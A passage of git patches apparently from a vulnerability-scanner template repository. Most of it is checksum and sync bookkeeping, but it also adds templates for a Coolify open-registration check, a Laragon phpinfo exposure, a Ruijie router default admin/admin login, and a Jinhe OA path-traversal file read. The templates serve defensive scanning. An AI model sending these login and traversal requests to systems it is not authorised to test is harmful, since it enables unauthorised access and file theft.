http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 -http/cves/2024/CVE-2024-4434.yaml:51caf6f2e39e823e64467f354b18f2aa00cee323 +http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a @@ -7922,7 +7923,7 @@ http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a7 http/vulnerabilities/other/avada-xss.yaml:09956730db06c6d4aa404e59c94ee74a60dde829 http/vulnerabilities/other/avcon6-execl-lfi.yaml:43a317b3891b8f3dd98a950eec826ee91a95b97d http/vulnerabilities/other/avcon6-lfi.yaml:31fda2c65574c91b2ccd8e140e03243fb9546bd0 -http/vulnerabilities/other/azon-dominator-sqli.yaml:a310586aa178c6f44c9c6aef46b653a50593f439 +http/vulnerabilities/other/azon-dominator-sqli.yaml:7483beba5590f73b979a38863503f30b7be95dcc http/vulnerabilities/other/bagisto-csti.yaml:dcc7c57c641a9a49e1e67ca561abce1574214656 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac @@ -8830,7 +8831,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6ad4e8d8c4fde6a2cfb0d2c738b207a960367008 +templates-checksum.txt:8fce8e9763222c652eea38bc4b9a18583bce00e1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7474d24f22ac130bfad814243b604e80a45489c8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:29:11 +0000 Subject: [PATCH 0879/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b15034dba4..b77e616401 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - 'dast/vulnerabilities/injection/csv-injection.yaml' - 'dast/vulnerabilities/injection/xinclude-injection.yaml' + - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' @@ -41,6 +42,7 @@ on: - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' + - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' workflow_dispatch: From b63d8c9c3319d5cf38348fdb4880edcd28b58bd1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:30:18 +0000 Subject: [PATCH 0880/1841] Auto Template Signing [Thu Jul 4 08:30:18 UTC 2024] :robot: --- http/cves/2020/CVE-2020-10189.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 39653c65ca..52960fb2c2 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -67,3 +67,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100cb3c5b5b1829fc6911828be549f9cd971bec2e2f049b2938748393bb96e164e5022100fed5121eb3d3902d8e4feaee8e6899dc596ae7ecd1bbb92aa9e516371ee59900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 212ac1e28f064722c28c702a33a6da0ed5c41ccb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 14:02:33 +0530 Subject: [PATCH 0881/1841] Update CVE-2024-36401.yaml --- http/cves/2024/CVE-2024-36401.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 5d554c4dbf..f870bc521a 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -6,7 +6,8 @@ info: severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. - impact: This vulnerability can lead to executing arbitrary code. + impact: | + This vulnerability can lead to executing arbitrary code. reference: - https://x.com/sirifu4k1/status/1808270303275241607 - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 From fe8df33c9624f08e95a85b36cc5c4c121c3eba7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 14:40:53 +0530 Subject: [PATCH 0882/1841] Create coolify-register-account.yaml --- .../coolify-register-account.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/coolify-register-account.yaml diff --git a/http/misconfiguration/coolify-register-account.yaml b/http/misconfiguration/coolify-register-account.yaml new file mode 100644 index 0000000000..23b0c2d407 --- /dev/null +++ b/http/misconfiguration/coolify-register-account.yaml @@ -0,0 +1,31 @@ +id: coolify-register-account + +info: + name: Coolify Register User Account - Enabled + author: DhiyaneshDk + severity: medium + description: | + Exposed Coolify user register page. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Coolify" html:"register" + tags: coolify,register,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/register" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Password again' + - 'Coolify' + condition: and + + - type: status + status: + - 200 From 5de7c39274e02d83247bb052b7950f87f3dcaa35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 15:04:15 +0530 Subject: [PATCH 0883/1841] Create laragon-phpinfo.yaml --- http/misconfiguration/laragon-phpinfo.yaml | 37 ++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/misconfiguration/laragon-phpinfo.yaml diff --git a/http/misconfiguration/laragon-phpinfo.yaml b/http/misconfiguration/laragon-phpinfo.yaml new file mode 100644 index 0000000000..88e1ace621 --- /dev/null +++ b/http/misconfiguration/laragon-phpinfo.yaml @@ -0,0 +1,37 @@ +id: laragon-phpinfo + +info: + name: Laragon - phpinfo Disclosure + author: DhiyaneshDk + severity: low + description: | + Laragon phpinfo file was exposed. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Laragon" html:"phpinfo" + tags: laragon,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/?q=info" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' + part: body From f253107faa5f50bb7736722827055d30c02a06ad Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 15:22:54 +0530 Subject: [PATCH 0884/1841] Create ruijie-nbr-default-login.yaml --- .../ruijie/ruijie-nbr-default-login.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/default-logins/ruijie/ruijie-nbr-default-login.yaml diff --git a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml new file mode 100644 index 0000000000..267da91cf1 --- /dev/null +++ b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml @@ -0,0 +1,44 @@ +id: ruijie-nbr-default-login + +info: + name: Ruijie NBR Series routers - Default Login + author: pussycat0x + severity: high + description: | + This template detects Ruijie NBR Series routers Default Login + metadata: + max-request: 1 + fofa-query: body="上层网络出现异常,请检查外网线路或联系ISP运营商协助排查" + tags: default-login,ruijie-nbr + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Length: 26 + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/login.html + Accept-Encoding: gzip, deflate, br + + user={{username}}&password={{password}} + + stop-at-first-match: true + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'index\.htm\?_([0-9]+)' + + - type: status + status: + - 200 From 5f8a16450ed04064c4f7591ef809d2973744ab87 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 15:23:25 +0530 Subject: [PATCH 0885/1841] Update ruijie-nbr-default-login.yaml --- http/default-logins/ruijie/ruijie-nbr-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml index 267da91cf1..023739bc74 100644 --- a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml +++ b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml @@ -8,6 +8,7 @@ info: This template detects Ruijie NBR Series routers Default Login metadata: max-request: 1 + verified: true fofa-query: body="上层网络出现异常,请检查外网线路或联系ISP运营商协助排查" tags: default-login,ruijie-nbr From 84ed090da3de3a07a8f0a520ac6a3197e121df5e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 15:51:40 +0530 Subject: [PATCH 0886/1841] Create jinhe-oa-c6-lfi.yaml --- .../other/jinhe-oa-c6-lfi.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml diff --git a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml new file mode 100644 index 0000000000..9394517686 --- /dev/null +++ b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml @@ -0,0 +1,31 @@ +id: jinhe-oa-c6-lfi + +info: + name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read + author: pussycat0x + severity: high + description: | + There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state. + metadata: + max-request: 1 + fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" + tags: jinhe-oa-c6,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MaxFolderTotal=1" + - "[JHFile]" + - "FolderTotal=1" + condition: and + + - type: status + status: + - 200 From 172cd66c3a154dbc5ae5cb4cbf2b1f53c972be96 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 15:52:49 +0530 Subject: [PATCH 0887/1841] Update jinhe-oa-c6-lfi.yaml --- http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml index 9394517686..291c839a07 100644 --- a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml +++ b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml @@ -8,6 +8,7 @@ info: There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state. metadata: max-request: 1 + verified: true fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" tags: jinhe-oa-c6,misconfig From d7c99d1749d548a1605eb016cf97a3eb315008d2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 15:55:14 +0530 Subject: [PATCH 0888/1841] Update jinhe-oa-c6-lfi.yaml --- http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml index 291c839a07..18de7b94f2 100644 --- a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml +++ b/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state. + reference: + - https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_C6_UploadFileDownLoadnew%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 verified: true From be132379daceb2a89a30bc4d6dc86148cd26e97a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:29:01 +0000 Subject: [PATCH 0889/1841] Auto Generated New Template Addition List [Thu Jul 4 10:29:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f55a063857..4a6c445cbe 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ http/exposures/backups/sql-server-dump.yaml http/exposures/configs/apache-pinot-config.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml +http/misconfiguration/coolify-register-account.yaml http/misconfiguration/forgejo-repo-exposure.yaml http/misconfiguration/installer/kodbox-installer.yaml http/misconfiguration/installer/piwigo-installer.yaml From c9a268ac27ee0f99e3095fd87e7feeefe82295f3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:29:10 +0000 Subject: [PATCH 0890/1841] Auto Generated Templates Checksum [Thu Jul 4 10:29:10 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 05238a7679..a24c0c611a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1816,7 +1816,7 @@ http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:ebc3ac73c1bc381c952a6d283b524b7defc38a77 http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 http/cves/2020/CVE-2020-10148.yaml:d43a17911b224fa2d73eb14d13f55b78f9f11e28 -http/cves/2020/CVE-2020-10189.yaml:10866e53b542268c4503f76ea8681972e02c4861 +http/cves/2020/CVE-2020-10189.yaml:ad4979e4c5965640fd9d2d0ecd0e189a02125da5 http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 http/cves/2020/CVE-2020-10220.yaml:5943d426d223a9162b34d7a51569878e7fbc92f8 http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc @@ -5497,6 +5497,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8 http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000 +http/misconfiguration/coolify-register-account.yaml:9052ffa32b044a88783c42b2c1aa04bf39253b94 http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce @@ -8831,7 +8832,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8fce8e9763222c652eea38bc4b9a18583bce00e1 +templates-checksum.txt:35426e32185b7b3c7e1fdfe25e992ab4dfbc289c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 036f81da28205e26eadfe5292b927e064732f8ac Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:29:55 +0000 Subject: [PATCH 0891/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b77e616401..7bd077d653 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -31,6 +31,7 @@ on: - 'http/exposures/configs/apache-pinot-config.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' + - 'http/misconfiguration/coolify-register-account.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' - 'http/misconfiguration/installer/kodbox-installer.yaml' - 'http/misconfiguration/installer/piwigo-installer.yaml' From cf004805068b922aeb720186a5b42dbdd0be33c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:30:53 +0000 Subject: [PATCH 0892/1841] Auto Template Signing [Thu Jul 4 10:30:53 UTC 2024] :robot: --- http/misconfiguration/coolify-register-account.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/coolify-register-account.yaml b/http/misconfiguration/coolify-register-account.yaml index 23b0c2d407..59625594cd 100644 --- a/http/misconfiguration/coolify-register-account.yaml +++ b/http/misconfiguration/coolify-register-account.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100abebc7e50964241a0e3b6737189d280e64f5f708283ef13d14e03f918909a255022100d107c8eb58a02a3ce23211544546e5a7f853da77dfe74e38448f281a37071e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d5d00bfa3f5b58c4bdc63b116725e8a621d390f6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:32:07 +0000 Subject: [PATCH 0893/1841] Auto Generated New Template Addition List [Thu Jul 4 10:32:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4a6c445cbe..f5bf509c8e 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2024/CVE-2024-29972.yaml http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-33605.yaml http/cves/2024/CVE-2024-34102.yaml +http/cves/2024/CVE-2024-36401.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml From 683b7d9e6e61c5fbcb673e2a84d7d57a74c11de8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:32:29 +0000 Subject: [PATCH 0894/1841] Auto Generated Templates Checksum [Thu Jul 4 10:32:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a24c0c611a..9d69d50881 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3459,6 +3459,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e +http/cves/2024/CVE-2024-36401.yaml:2e0f10aacc4072d68d8cc25058fe304485e7d212 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -5497,7 +5498,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8 http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000 -http/misconfiguration/coolify-register-account.yaml:9052ffa32b044a88783c42b2c1aa04bf39253b94 +http/misconfiguration/coolify-register-account.yaml:827e19311282e8377dbd7c1f1fb30d21cd06c81e http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce @@ -8832,7 +8833,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:35426e32185b7b3c7e1fdfe25e992ab4dfbc289c +templates-checksum.txt:360c139d0c36fccbca53603dad29aaccb1b77b1a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6cfe4dce95628b236b3e0a630cfda4c41939a399 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:32:51 +0000 Subject: [PATCH 0895/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7bd077d653..6690ddc848 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/cves/2024/CVE-2024-32709.yaml' - 'http/cves/2024/CVE-2024-33605.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' + - 'http/cves/2024/CVE-2024-36401.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' From b88d5c8a3c5c667c1e2547c4781011818b0b6483 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:33:49 +0000 Subject: [PATCH 0896/1841] Auto Generated New Template Addition List [Thu Jul 4 10:33:48 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f5bf509c8e..d307d82989 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml http/cves/2024/CVE-2024-5522.yaml +http/cves/2024/CVE-2024-5947.yaml http/cves/2024/CVE-2024-6028.yaml http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml From 810055d9f9b8e13b75fe3c53bfcdb906e98208d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:33:53 +0000 Subject: [PATCH 0897/1841] Auto Generated Templates Checksum [Thu Jul 4 10:33:53 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9d69d50881..c353ba6ead 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3477,6 +3477,7 @@ http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a +http/cves/2024/CVE-2024-5947.yaml:4d8ef0dca22f3e2c4e5e01b65266926e283485b7 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -8833,7 +8834,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:360c139d0c36fccbca53603dad29aaccb1b77b1a +templates-checksum.txt:5581aa635a36465f8c29530d8484c309a35d67cb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 98e32d75ec8d4a886b80018413e8fe9fef15e338 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:34:10 +0000 Subject: [PATCH 0898/1841] Auto Template Signing [Thu Jul 4 10:34:10 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36401.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index f870bc521a..51a858d7ad 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -65,3 +65,4 @@ http: part: content_type words: - "application/xml" +# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 017304cd426491cb5f3f03da66e818d3634e125c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 16:04:22 +0530 Subject: [PATCH 0899/1841] minor update --- http/vulnerabilities/other/crocus-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/crocus-lfi.yaml b/http/vulnerabilities/other/crocus-lfi.yaml index a9df36dcdf..21babae9c2 100644 --- a/http/vulnerabilities/other/crocus-lfi.yaml +++ b/http/vulnerabilities/other/crocus-lfi.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: high description: | - This template detects the ability to download the win.ini file from the Windows directory by exploiting a file download vulnerability. + There is an arbitrary file reading vulnerability in the Service.do interface of Ruiming Technology's Crocus system. An unauthenticated remote attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc. This leaves the website in an extremely unsafe state. reference: - 